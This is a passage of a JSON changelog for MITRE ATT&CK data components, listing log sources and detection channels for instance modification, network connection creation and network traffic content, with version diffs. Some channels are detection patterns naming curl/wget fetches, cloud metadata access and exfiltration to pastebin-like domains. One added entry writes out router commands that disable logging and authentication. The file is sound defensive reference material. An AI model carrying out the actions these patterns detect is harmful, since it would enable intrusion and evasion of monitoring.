                            "name": "MDM:DeviceIntegrity",
                            "channel": "jailbreak/root compromise indicators or integrity attestation failures enabling process visibility"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "System reboot scheduled or performed"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "TCP: possible SYN flood or backlog limit exceeded"
                        },
                        {
                            "name": "OEMAttestation:Knox",
                            "channel": "Samsung Knox attestation shows attestation_state=COMPROMISED or warranty bit set"
                        },
                        {
                            "name": "prometheus:metrics",
                            "channel": "Container CPU/Memory usage exceeding threshold"
                        },
                        {
                            "name": "sar:network",
                            "channel": "Outbound network saturation with minimal process activity"
                        },
                        {
                            "name": "Sensor Health",
                            "channel": "None"
                        },
                        {
                            "name": "Windows:perfmon",
                            "channel": "Sustained CPU/memory exhaustion by service process (e.g., w3wp.exe)"
                        },
                        {
                            "name": "Windows:perfmon",
                            "channel": "High sustained CPU usage by a single process"
                        },
                        {
                            "name": "Windows:perfmon",
                            "channel": "Sudden spike in outbound throughput without corresponding inbound traffic"
                        },
                        {
                            "name": "Windows:perfmon",
                            "channel": "Sudden spikes in CPU/Memory usage linked to specific application processes"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-TCPIP",
                            "channel": "Connection queue overflow or failure to allocate TCP state object"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=1166, 7045"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=1074"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=6006"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=16"
                        },
                        {
                            "name": "WinEventLog:System",
                            "channel": "System shutdowns due to bugcheck (Event ID 1001) or watchdog timer expirations"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "mobile-attack",
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-20 18:17:23.974000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][0]\": {\"name\": \"networkdevice:syslog\", \"channel\": \"no logging host, no aaa new-model, no snmp-server, commit\"}, \"root['x_mitre_log_sources'][1]\": {\"name\": \"android:appops\", \"channel\": \"ACCESS_FINE_LOCATION|NEARBY_DEVICES|BLUETOOTH_SCAN used in close proximity to network-context queries\"}, \"root['x_mitre_log_sources'][2]\": {\"name\": \"AndroidAttestation:SafetyNet\", \"channel\": \"SafetyNet attestation with CTSProfileMatch=false or BasicIntegrity=false\"}, \"root['x_mitre_log_sources'][3]\": {\"name\": \"AndroidAttestation:VerifiedBoot\", \"channel\": \"Verified Boot or dm-verity reports partition hash mismatch, non-green boot state, or integrity failure\"}, \"root['x_mitre_log_sources'][4]\": {\"name\": \"AndroidLogs:Crash\", \"channel\": \"Crash or abnormal restart of privileged system services (for example, system_server, mediaserver, installd) followed shortly by new privileged process activity or binder connections from a single app UID\"}, \"root['x_mitre_log_sources'][5]\": {\"name\": \"AndroidLogs:Crash\", \"channel\": \"Application or system process crash/restart patterns temporally associated with remote service communications\"}, \"root['x_mitre_log_sources'][15]\": {\"name\": \"iOS:MDMLog\", \"channel\": \"Device risk, compliance, or security posture changes after trusted host pairing or developer-state transition\"}, \"root['x_mitre_log_sources'][16]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"code signature validation failure / exec of invalidly-signed payload from sandboxed app\"}, \"root['x_mitre_log_sources'][17]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Application crash logs, watchdog terminations, or abnormal execution events associated with service communication\"}, \"root['x_mitre_log_sources'][33]\": {\"name\": \"MDM:DeviceIntegrity\", \"channel\": \"jailbreak/root compromise indicators or integrity attestation failures enabling process visibility\"}, \"root['x_mitre_log_sources'][36]\": {\"name\": \"OEMAttestation:Knox\", \"channel\": \"Samsung Knox attestation shows attestation_state=COMPROMISED or warranty bit set\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--45d0ff14-b9c4-41f5-8603-156657c20b75",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.274000+00:00",
                    "modified": "2026-04-16 17:07:21.897000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0073",
                            "external_id": "DC0073"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Instance Modification",
                    "description": "Changes made to a virtual machine (VM) or compute instance, including alterations to its configuration, metadata, attached policies, or operational state. Such modifications can include updating metadata, attaching or detaching resource policies, resizing instances, or modifying network configurations. Examples:\n\n- AWS: instance modifications include API actions like `ModifyInstanceAttribute`, `ModifyInstanceMetadataOptions`, or `RebootInstances`.\n- Azure: modifications can be tracked through operations like `Microsoft.Compute/virtualMachines/write`.\n- GCP: instance modification events include operations like `instances.setMetadata`, `instances.addResourcePolicies`, or `instances.resize`.\n\n*Data Collection Measures:*\n\n- AWS CloudTrail: Log Location: Stored in S3 or forwarded to CloudWatch.\n- Azure Activity Logs: Log Location: Accessible via Azure Monitor or exported to a storage account.\n- GCP Audit Logs: Log Location: Logs Explorer or BigQuery.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "RevertSnapshot"
                        },
                        {
                            "name": "azure:activity",
                            "channel": "MICROSOFT.COMPUTE/VIRTUALMACHINES/RESTORE"
                        },
                        {
                            "name": "gcp:audit",
                            "channel": "compute.instances.restore"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "ModifyInstanceAttribute"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 17:07:21.897000+00:00\", \"old_value\": \"2025-10-21 15:14:40.223000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][3]\": {\"name\": \"AWS:CloudTrail\", \"channel\": \"ModifyInstanceAttribute\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.274000+00:00",
                    "modified": "2026-04-23 18:37:33.992000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0082",
                            "external_id": "DC0082"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Network Connection Creation",
                    "description": "The initial establishment of a network session, where a system or process initiates a connection to a local or remote endpoint. This typically involves capturing socket information (source/destination IP, ports, protocol) and tracking session metadata. Monitoring these events helps detect lateral movement, exfiltration, and command-and-control (C2) activities.\n\n*Data Collection Measures:*\n\n- Windows:\n    - Event ID 5156 \u2013 Filtering Platform Connection - Logs network connections permitted by Windows Filtering Platform (WFP).\n    - Sysmon Event ID 3 \u2013 Network Connection Initiated - Captures process, source/destination IP, ports, and parent process.\n- Linux/macOS:\n    - Netfilter (iptables), nftables logs - Tracks incoming and outgoing network connections.\n    - AuditD (`connect` syscall) - Logs TCP, UDP, and ICMP connections.\n    - Zeek (`conn.log`) - Captures protocol, duration, and bytes transferred.\n- Cloud & Network Infrastructure:\n    - AWS VPC Flow Logs / Azure NSG Flow Logs - Logs IP traffic at the network level in cloud environments.\n    - Zeek (conn.log) or Suricata (network events) - Captures packet metadata for detection and correlation.\n- Endpoint Detection & Response (EDR):\n    - Detect anomalous network activity such as new C2 connections or data exfiltration attempts.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "NSM:Flow",
                            "channel": "log entries indicating network connection initiation on macOS"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "connect"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execs of chromium, google-chrome, firefox, libreoffice with http(s) in cmdline"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "connect/sendto"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open or connect syscalls on /tmp/ssh-* or $SSH_AUTH_SOCK"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "socket/connect with TLS context by unexpected process"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "socket/bind: New bind() to a previously closed port shortly after the sequence."
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "sendto/connect"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "outbound connections"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "socket/bind: Process binds to a new local port shortly after knock"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "socket/connect calls showing SSH processes forwarding arbitrary ports"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "openat,connect -k discovery"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "Outbound connection to 169.254.169.254 from EC2 workload"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "Large transfer volume (>20MB) from RDS IP range to external public IPs"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "High outbound traffic from new region resource"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "Outbound connections to port 22, 3389"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "Traffic observed on mirror destination instance"
                        },
                        {
                            "name": "cni:netflow",
                            "channel": "outbound connection to internal or external APIs"
                        },
                        {
                            "name": "ebpf:syscalls",
                            "channel": "socket connect"
                        },
                        {
                            "name": "esxi:esxupdate",
                            "channel": "/var/log/esxupdate.log or /var/log/vmksummary.log"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "System service interactions"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "Service initiated connections"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "Service-Based Network Connection"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "protocol egress"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "network activity"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "None"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "network session initiation with external HTTPS services"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "family=AF_PACKET or protocol raw; process name not in allowlist."
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "network"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "postfix/smtpd"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "New Wi-Fi connection established or repeated association failures"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "None"
                        },
                        {
                            "name": "linux:Sysmon",
                            "channel": "EventCode=3, 22"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "ES_EVENT_TYPE_NOTIFY_CONNECT"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "process_events/socket_events"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "execution of trusted tools interacting with external endpoints"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "launchd or network_events"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "process_events + launchd"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "process_events, socket_events"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "CONNECT: Long-lived connections from remote-control parents to external IPs/domains"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "None"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "connection attempts"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "connection open"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "network connection events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "First outbound connection from the same PID/user shortly after an inbound trigger."
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "network sessions initiated by remote desktop apps"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Inbound connections to VNC/SSH ports"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "network"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Outbound Traffic"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "None"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "networkd or socket"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream network activity"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Association and authentication events including failures and new SSIDs"
                        },
                        {
                            "name": "Network",
                            "channel": "None"
                        },
                        {
                            "name": "Network Traffic",
                            "channel": "None"
                        },
                        {
                            "name": "networkdevice:Flow",
                            "channel": "Traffic from mirrored interface to mirror target IP"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Dynamic route changes"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "web domain alerts"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "New outbound connection from Safari/Chrome/Firefox/Word"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Outbound connections from newly spawned child processes or from the browser to uncommon endpoints or on anomalous ports"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Outbound connection after script or installer launch"
                        },
                        {
                            "name": "NSM:Firewall",
                            "channel": "Outbound Connections"
                        },
                        {
                            "name": "NSM:Firewall",
                            "channel": "proxy or TLS inspection logs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "New TCP/443 or TCP/80 to domain not previously seen for the user/host"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "conn.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound connection to *.tunnels.api.visualstudio.com or *.devtunnels.ms"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Connections to *.devtunnels.ms or tunnels.api.visualstudio.com"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTPs connection to tunnels.api.visualstudio.com"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound or inbound TFTP file transfers of ROMMON or firmware binaries"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "connection: TCP connections to ports 139/445 to multiple hosts"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "connection: SMB connections to multiple internal hosts"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound HTTP/S initiated by newly installed interpreter process"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "outbound connections to RMM services or to unusual destination ports"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Multiple failed connections (conn_state=REJ/S0 or history has 'R') across distinct ports from the same src_ip followed by success to a specific port."
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Sequence of REJ/S0 then SF success from same src_ip within TimeWindow."
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Series of denied/closed flows to distinct ports then success to mgmt port from same src_ip within TimeWindow."
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound traffic spike through formerly blocked ports/subnets following config change"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "New egress to Internet by the same UID/host shortly after terminal exec"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "connection: Inbound connections to SSH or VPN ports"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "External access to container ports (2375, 6443)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "remote access"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound Connections"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "connection attempts"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "High-volume or repeated SNMP GETBULK/GETNEXT queries from untrusted or external IPs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "outbound connections from host during or immediately after image build"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "new outbound connection from browser/office lineage"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "new outbound connection from exploited lineage"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Multiple failed connections to closed ports (history contains 'R' or conn_state in {REJ, S0}) followed by a successful handshake to a new port from same src within TimeWindowKnock"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Closed-port hits followed by success from same src_ip"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Port-knock pattern from one src to device unicast,broadcast,network addresses on same port within TimeWindowKnock"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Unexpected inbound/outbound TFTP traffic for device image files"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Unexpected or unauthorized inbound connections to SNMP, NETCONF, or RESTCONF services"
                        },
                        {
                            "name": "snmp:access",
                            "channel": "GETBULK/GETNEXT requests for OIDs associated with configuration parameters"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-Bits-Client/Operational",
                            "channel": "BITS job lifecycle events such as job create/modify/transfer/complete and URL/remote name fields"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-WLAN-AutoConfig",
                            "channel": "EventCode=8001, 8002, 8003"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=5156, 5157"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=3, 22"
                        },
                        {
                            "name": "WinEventLog:System",
                            "channel": "EventCode=8001"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "ics-attack",
                        "mobile-attack",
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 18:37:33.992000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][0]\": {\"name\": \"NSM:Flow\", \"channel\": \"log entries indicating network connection initiation on macOS\"}, \"root['x_mitre_log_sources'][53]\": {\"name\": \"Network\", \"channel\": \"None\"}, \"root['x_mitre_log_sources'][60]\": {\"name\": \"NSM:Connections\", \"channel\": \"Outbound connection after script or installer launch\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.274000+00:00",
                    "modified": "2026-04-22 14:48:50.367000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0085",
                            "external_id": "DC0085"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Network Traffic Content",
                    "description": "The full packet capture (PCAP) or session data that logs both protocol headers and payload content. This allows analysts to inspect command and control (C2) traffic, exfiltration, and other suspicious activity within network communications. Unlike metadata-based logs, full content analysis enables deeper protocol inspection, payload decoding, and forensic investigations.\n\n*Data Collection Measures:*\n\n- Network Packet Capture (Full Content Logging)\n    - Wireshark / tcpdump / tshark\n        - Full packet captures (PCAP files) for manual analysis or IDS correlation. `tcpdump -i eth0 -w capture.pcap`\n    - Zeek (formerly Bro)\n        - Extracts protocol headers and payload details into structured logs. `echo \"redef Log::default_store = Log::ASCII;\" > local.zeek | zeek -Cr capture.pcap local.zeek`\n    - Suricata / Snort (IDS/IPS with PCAP Logging)\n        - Deep packet inspection (DPI) with signature-based and behavioral analysis. `suricata -c /etc/suricata/suricata.yaml -i eth0 -l /var/log/suricata`\n- Host-Based Collection\n    - Sysmon Event ID 22 \u2013 DNS Query Logging, Captures DNS requests made by processes, useful for detecting C2 domains.\n    - Sysmon Event ID 3 \u2013 Network Connection Initiated, Logs process-to-network connection relationships.\n    - AuditD (Linux) \u2013 syscall=connect, Monitors outbound network requests from processes. `auditctl -a always,exit -F arch=b64 -S connect -k network_activity`\n- Cloud & SaaS Traffic Collection\n    - AWS VPC Flow Logs / Azure NSG Flow Logs / Google VPC Flow Logs, Captures metadata about inbound/outbound network traffic.\n    - Cloud IDS (AWS GuardDuty, Azure Sentinel, Google Chronicle), Detects malicious activity in cloud environments by analyzing network traffic patterns.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "Traffic",
                            "channel": "None"
                        },
                        {
                            "name": "ALB:HTTPLogs",
                            "channel": "AWS ALB/ELB/GCP/Azure Application Gateway HTTP logs with unusual methods, long URIs, serialized payloads, 4xx/5xx bursts"
                        },
                        {
                            "name": "apache:access_log",
                            "channel": "Unusual HTTP POST or PUT requests to paths such as '/uploads/', '/admin/', or CMS plugin folders"
                        },
                        {
                            "name": "API:ConfigRepoAudit",
                            "channel": "Access to configuration repository endpoints, unusual enumeration requests or mass downloads"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "setsockopt, ioctl modifying ARP entries"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "Traffic between instances"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "Large volume of malformed or synthetic payloads to application endpoints prior to failure"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "Unusual volume of data transferred from S3 storage endpoints to non-corporate IPs"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "High volume internal-to-internal IP transfer or cross-account cloud transfer"
                        },
                        {
                            "name": "azure:activity",
                            "channel": "networkInsightsLogs"
                        },
                        {
                            "name": "azure:vpcflow",
                            "channel": "HTTP requests to 169.254.169.254 or Azure Metadata endpoints"
                        },
                        {
                            "name": "container:proxy",
                            "channel": "outbound/inbound network activity from spawned pods"
                        },
                        {
                            "name": "docker:events",
                            "channel": "remote API calls to /containers/create or /containers/{id}/start"
                        },
                        {
                            "name": "docker:stats",
                            "channel": "unusual network TX/RX byte deltas"
                        },
                        {
                            "name": "ebpf:syscalls",
                            "channel": "Process within container accesses link-local address 169.254.169.254"
                        },
                        {
                            "name": "EDR:hunting",
                            "channel": "Advanced Hunting: DeviceProcessEvents + DeviceNetworkEvents"
                        },
                        {
                            "name": "esxcli:network",
                            "channel": "Socket sessions with randomized payloads inconsistent with TLS"
                        },
                        {
                            "name": "esxcli:network",
                            "channel": "listening sockets bound to non-standard ports"
                        },
                        {
                            "name": "esxcli:network",
                            "channel": "listening sockets bound with non-standard encapsulated protocols"
                        },
                        {
                            "name": "esxcli:network",
                            "channel": "Socket inspection showing RSA key exchange outside baseline endpoints"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "Network activity"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "Outbound traffic using encoded payloads post-login"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "HTTPS POST connections to webhook endpoints"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "Inspection of sockets showing encrypted sessions from non-baseline processes"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "HTTPS POST connections to pastebin-like domains"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "network stack module logs"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "Suspicious traffic filtered or redirected by VM networking stack"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "VMCI syslog entries"
                        },
                        {
                            "name": "esxi:vob",
                            "channel": "NFS/remote access logs"
                        },
                        {
                            "name": "etw:Microsoft-Windows-NDIS-PacketCapture",
                            "channel": "TLS Handshake/Network Flow"
                        },
                        {
                            "name": "etw:Microsoft-Windows-WinINet",
                            "channel": "HTTPS Inspection"
                        },
                        {
                            "name": "etw:Microsoft-Windows-WinINet",
                            "channel": "WinINet API telemetry"
                        },
                        {
                            "name": "gcp:audit",
                            "channel": "network.query*"
                        },
                        {
                            "name": "gcp:vpcflow",
                            "channel": "first 5m egress to unknown ASNs"
                        },
                        {
                            "name": "IDS:TLSInspection",
                            "channel": "Malformed certs, incomplete asymmetric handshakes, or invalid CAs"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Per-app VPN flow logging indicating opaque/archived payload transfer preceding local decode"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Per-App VPN flow with code-like content types (application/octet-stream, application/zip, text/javascript, application/x-mach-o)"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "WKWebView navigation to domain visually similar to target brand (IDN/punycode/alike score)"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Query to suspicious domain with high entropy or low reputation"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "curl|wget|python .*http"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Unexpected SQL or application log entries showing tampered or malformed data"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Integrity mismatch warnings or malformed packets detected"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "DNS response IPs followed by connections to non-standard calculated ports"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Multiple NXDOMAIN responses and high entropy domains"
                        },
                        {
                            "name": "m365:office",
                            "channel": "External HTTP/DNS connection from Office binary shortly after macro trigger"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process + network metrics correlation for bandwidth saturation"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "DNS query with pseudo-random subdomain patterns"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "network flow"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "curl|osascript.*open location"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "subsystem: com.apple.network"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "open URL|clicked link|LSQuarantineAttach"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "None"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Connections to suspicious domains with mismatched certificate or unusual patterns"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "HTTP POST with encoded content in user-agent or cookie field"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Suspicious outbound HTTPS requests to domains flagged as newly registered or untrusted after spearphishing message interaction"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream (subsystem: com.apple.system.networking)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Encrypted connection with anomalous payload entropy"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Rapid incoming TLS handshakes or HTTP requests in quick succession"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "network, socket, and http logs"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "DNS responses followed by connections to ports outside standard ranges"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Persistent outbound traffic to mining domains"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Encrypted session initiation by unexpected binary"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "eventMessage = 'promiscuous'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "outbound HTTPS connections to code repository APIs"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "eventMessage = 'open', 'sendto', 'connect'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "dns-sd, mDNSResponder, socket activity"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process + network activity"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "subsystem=com.apple.WebKit"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "subsystem: com.apple.WebKit or com.apple.WebKit.Networking"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "encrypted outbound traffic carrying unexpected application data"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Persistent outbound connections with consistent periodicity"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "TLS connections with abnormal handshake sequence or self-signed cert"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Web server process initiating outbound TCP connections not tied to normal server traffic"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "outbound TLS connections to cloud storage providers"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "outbound HTTPS connections to cloud storage APIs"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process, network"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process = 'ssh' OR eventMessage CONTAINS 'ssh'"
                        },
                        {
                            "name": "Netfilter/iptables",
                            "channel": "Forwarded packets log"
                        },
                        {
                            "name": "Network Traffic",
                            "channel": "None"
                        },
                        {
                            "name": "networkconfig ",
                            "channel": "interface flag PROMISC, netstat | ip link | ethtool"
